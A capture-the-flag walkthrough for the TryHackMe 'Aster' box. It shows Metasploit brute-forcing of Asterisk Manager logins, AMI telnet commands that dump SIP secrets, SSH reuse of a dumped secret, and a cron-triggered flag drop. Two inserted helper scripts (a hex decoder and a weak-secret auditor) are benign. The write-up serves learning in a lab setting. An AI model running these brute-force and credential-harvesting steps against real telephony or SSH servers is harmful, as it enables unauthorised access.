TryHackMe Aster Writeup

This writeup helps you find the flags of the Aster box on TryHackMe. The box teaches you about decompiling .pyc files and gives a general introduction to Asterisk, the open-source telephony platform.

TryHackMe Aster – Enumeration

The first step is enumerating the services running on the box. We use nmap to scan for open ports with the following command:

nmap -p- -sV -sC -Pn -vvv <HOST_IP>

The -sV flag performs service/version detection, -sC runs the default NSE scripts and -Pn skips host discovery. Furthermore, we add the -p- flag to scan all 65536 ports. The results of the scan can be seen below:

PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fe:e3:52:06:50:93:2e:3f:7a:aa:fc:69:dd:cd:14:a2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDEs6oKJb5SNNUczex8j97pL/V93XRaRytbAH7iR9pN0HbCmc2bD/Rg4IUuDArz4USY1G5aN0r+C3fcBSlmLWaqk+uzbNZFriELMcJPKa7tP7zx7o4TVMQDepvvcZUy9Z8QoA+n4cJYOjlldkWGq/dmsPQqBHDmHowxMauJkZxh2QVR0WpDZxcjbS26O8aC62QvT5ct9wgzBzD/dVV/SC3VH7sQOPsEFj+PHGoHrFz7MntxtRyR9Ujf+Dzbk2wnUVGrc6NZt8MV3vfo5nXjBRPTaIX6XNTijQxoj0/0NJ3YwntmHOQXaPu4++fzjP9cf4+r8PNppeKNYwWLRxzjnAiZ
|   256 9c:4d:fd:a4:4e:18:ca:e2:c0:01:84:8c:d2:7a:51:f2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPROPGV3YntCB4YEBuSk7u8qF0H9WxI9nTGbCJahJP4gJNcEj4uwn24Ep1eSs0kHxjFdri6+QQlPUygwRvAQqTs=
|   256 c5:93:a6:0c:01:8a:68:63:d7:84:16:dc:2c:0a:96:1d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrB46mC2C71WGXfIc9TwwLWhC99D9M2IxUHbQCbH0vp
80/tcp   open  http        syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Aster CTF
1720/tcp open  h323q931?   syn-ack
2000/tcp open  cisco-sccp? syn-ack
5038/tcp open  asterisk    syn-ack Asterisk Call Manager 5.0.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The most interesting ports are 80 and 5038. Port 80 serves an Apache web server. Port 5038 is the Asterisk Manager Interface. Asterisk is an open-source telephony platform for Linux and macOS that is used to route calls automatically. You can find more information about the Asterisk platform here. We start by checking the Apache web server.

TryHackMe Aster – Apache web server

By browsing to http://HOST_IP/ you see the following page.

TryHackMe Aster apache

Before we recklessly download the file linked on the page, we inspect the link to check what kind of file it is. It turns out to be a .pyc file, which contains compiled Python bytecode of a source file. Downloading it allows us to recover the original Python code, which might reveal some interesting information. Download the file. It is not readable as-is, so we need to decompile it. This can be done with uncompyle2; follow the instructions on its GitHub page to install the tool.

Run uncompyle2 output.pyc to recover the original Python code. The result of this command can be seen below.

import pyfiglet
o0OO00 = pyfiglet.figlet_format('Hello!!')
oO00oOo = '476f6f64206a6f622c2075736572202261646d696e2220746865206f70656e20736f75726365206672616d65776f726b20666f72206275696c64696e6720636f6d6d756e69636174696f6e732c20696e7374616c6c656420696e20746865207365727665722e'
OOOo0 = bytes.fromhex(oO00oOo)
Oooo000o = OOOo0.decode('ASCII')
if 0:
    i1 * ii1IiI1i % OOooOOo / I11i / o0O / IiiIII111iI
Oo = '476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21'
I1Ii11I1Ii1i = bytes.fromhex(Oo)
Ooo = I1Ii11I1Ii1i.decode('ASCII')
if 0:
    iii1I1I / O00oOoOoO0o0O.O0oo0OO0 + Oo0ooO0oo0oO.I1i1iI1i - II
print o0OO00

There are some hidden hexadecimal strings within the Python file. Decoding them using CyberChef returns the following messages:

Good job, user "*****" the open source framework for building communications, installed in the server.

Good job reverser, python is very cool!Good job reverser, python is very cool!Good job reverser, python is very cool!
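The same decoding, as an added example that is not part of the original writeup: instead of pasting each hex string into CyberChef, this script tokenises the decompiled source and decodes every string literal that is even-length hex and yields printable ASCII. The sample source is constructed from the decompiled file above (one copy of the "Good job reverser" message plus a made-up hint in place of the redacted one).

```python
import ast
import io
import re
import string
import tokenize

# Added example (not from the original writeup): tokenize is used rather
# than ast so that the Python 2 `print o0OO00` line in the decompiled
# file does not break parsing; only STRING tokens are inspected.
HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2})+$")

# Constructed sample modelled on the decompiled file above. The first hex
# string is a constructed stand-in for the redacted hint, the second is
# one copy of the page's "Good job reverser" message.
SAMPLE_SOURCE = """import pyfiglet
o0OO00 = pyfiglet.figlet_format('Hello!!')
oO00oOo = '706f72742035303338'
OOOo0 = bytes.fromhex(oO00oOo)
if 0:
    i1 * ii1IiI1i % OOooOOo
Oo = '476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21'
short = 'abcd'
print o0OO00
"""


def decode_hex_literals(source, min_len=16):
    """Return [(line_number, decoded_text)] for every string literal in
    `source` that is at least min_len hex digits and decodes to printable ASCII."""
    results = []
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        if tok.type != tokenize.STRING:
            continue
        try:
            value = ast.literal_eval(tok.string)
        except (ValueError, SyntaxError):
            continue  # literal form not understood by Python 3; skip it
        if not isinstance(value, str) or len(value) < min_len or not HEX_RE.match(value):
            continue
        text = bytes.fromhex(value).decode("ascii", errors="replace")
        if all(c in string.printable for c in text):
            results.append((tok.start[0], text))
    return results


if __name__ == "__main__":
    for lineno, text in decode_hex_literals(SAMPLE_SOURCE):
        print(f"line {lineno}: {text}")
```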

TryHackMe Aster – Asterisk service

Note that we have replaced the username with asterisks. Now that we have a username, we can try to brute-force the matching Asterisk Manager password: the decoded sentence hints that this user belongs to "the open source framework for building communications", which clearly refers to Asterisk. Luckily, Metasploit provides a module that brute-forces Asterisk Manager logins. Start Metasploit by running msfconsole. The following snippet shows the options you have to set for the module to succeed:

use auxiliary/voip/asterisk_login
set RHOSTS <HOST_IP>
set USERNAME admin
run

The module's default password list is used. If the password is not in that list, you can point the module at rockyou.txt instead. After a few minutes we find a valid username and password combination, so we can now gain access to the Asterisk Manager.

To connect to the server we use telnet on port 5038, the port the Asterisk Manager listens on. Run the following command in your terminal:

telnet <HOST_IP> 5038

Success! The following banner is displayed in the terminal, showing that we are connected to the Asterisk Manager:

Asterisk Call Manager/5.0.2

At this point, I did not have a clue on how to log in to the Asterisk Manager. I searched and found the following link, which explains how to log in. After running the telnet command, type the following lines into the telnet session:

ACTION: LOGIN
USERNAME: *****
SECRET: ******
EVENTS: ON

If successful we should see the following output:

Response: Success
Message: Authentication accepted

Event: FullyBooted
Privilege: system,all
Uptime: 10220
LastReload: 10220
Status: Fully Booted

TryHackMe Aster – Asterisk find users

We are now logged in to the Asterisk Manager and can run commands. To list all available commands, run:

action:command
command:help

An interesting command in this list is sip show users. Run it as follows:

action:command
command:sip show users

The output can be seen below:

Message: Command output follows
Output: Username                   Secret           Accountcode      Def.Context      ACL  Forcerport
Output: 100                        100                               test             No   No        
Output: 101                        101                               test             No   No        
Output: harry                      ***********                       test             No   No 

This looks like a valid username and password combination. The table lists all SIP peers that are allowed to use the server, together with their secrets. The secret for harry might also be his SSH password, so try to log in to the SSH server as harry:

ssh harry@<HOST_IP>

harry@ubuntu:~$ 
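The AMI exchange used above (the Login packet and the sip show users response), as an added example that is not part of the original writeup: it frames an AMI action, parses a response into headers, and audits the fixed-width peer table for secrets that are empty or identical to the username, which is exactly what the 100/100 and 101/101 entries show. It runs on a constructed copy of the response and opens no network connection; harry's secret is a placeholder.

```python
# Added example (not from the original writeup): frame and parse Asterisk Manager
# Interface (AMI) packets, then audit the 'sip show users' table for peers whose
# secret is empty or equal to the username (100/100 and 101/101 above). Constructed
# text only, no network connection. A packet is "Header: value" lines + blank line.

def build_action(action, **headers):
    """Serialise one AMI action, e.g. the Login packet typed into telnet above."""
    lines = [f"Action: {action}"] + [f"{k}: {v}" for k, v in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n"

def parse_packet(raw):
    """Parse one AMI response; repeated 'Output:' headers become a list."""
    msg = {}
    for line in raw.strip().splitlines():
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Output":
            msg.setdefault("Output", []).append(value)
        else:
            msg[key] = value
    return msg

def parse_sip_users(output_lines):
    """Split the fixed-width table into (username, secret) using header offsets."""
    header = output_lines[0]
    secret_col, acct_col = header.index("Secret"), header.index("Accountcode")
    peers = []
    for row in output_lines[1:]:
        user, secret = row[:secret_col].strip(), row[secret_col:acct_col].strip()
        if user:
            peers.append((user, secret))
    return peers

def weak_sip_peers(peers):
    """Usernames whose secret is missing or identical to the username."""
    return [u for u, s in peers if not s or u == s]

def _row(user, secret, context):
    return f"Output: {user:<27}{secret:<17}{'':<17}{context:<17}No   No"

# Constructed response mirroring the writeup's output; harry's secret is a placeholder.
SAMPLE_RESPONSE = "\r\n".join([
    "Response: Success",
    "Message: Command output follows",
    f"Output: {'Username':<27}{'Secret':<17}{'Accountcode':<17}{'Def.Context':<17}ACL  Forcerport",
    _row("100", "100", "test"),
    _row("101", "101", "test"),
    _row("harry", "REDACTED_SECRET", "test"),
]) + "\r\n\r\n"
```

Calling weak_sip_peers(parse_sip_users(parse_packet(SAMPLE_RESPONSE)["Output"])) returns the two peers that an administrator should fix first.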

TryHackMe Aster – root flag

And we are in! The user flag is in harry's home directory: run cat /home/harry/user.txt to read it. Now let's find the root flag. In the same directory you find the Example_Root.jar file. Extract the class with unzip Example_Root.jar. To inspect Example_Root.class with Ghidra you need to transfer it to your local machine: run python3 -m http.server on the box, in the directory that holds Example_Root.class, then download the file on your local machine by running wget http://<HOST_IP>:8000/Example_Root.class. Open the class file in Ghidra to decompile it; the result is shown below.

/* Flags:
     ACC_PUBLIC
     ACC_STATIC
   
   public static void main(java.lang.String[])  */

void main_java.lang.String[]_void(String[] param1)

{
  PrintStream objectRef;
  boolean bVar1;
  FileWriter objectRef_00;
  File objectRef_01;
  
  objectRef_01 = new File("/tmp/flag.dat");
  bVar1 = Example_Root.isFileExists(objectRef_01);
  if (bVar1 != false) {
    objectRef_00 = new FileWriter("/home/harry/root.txt");
    objectRef_00.write("my secret <3 baby");
    objectRef_00.close();
    objectRef = System.out;
    objectRef.println("Successfully wrote to the file.");
  }
  return;
}

Something is written to /home/harry/root.txt whenever /tmp/flag.dat exists, presumably the contents of the root flag. The only question is when this program runs. Perhaps a cron job executes it. Running cat /etc/crontab shows the following cron jobs:

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
*  *	* * *	root	cd /opt/ && bash ufw.sh
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *	* * *	root	cd /root/java/ && bash run.sh

Although you cannot view the contents of run.sh, a script in /root/java/ is executed by root every minute, which suggests it runs the Java program. Let's create the /tmp/flag.dat file and wait one minute. Create the file by running echo "Hello World" > /tmp/flag.dat. After a minute root.txt appears in /home/harry, and its content is indeed the root flag!

Even without a real privilege escalation, we were able to obtain the root flag. This box taught me a lot about the Asterisk platform. I also learned that valuable information can be found by decompiling binary files.
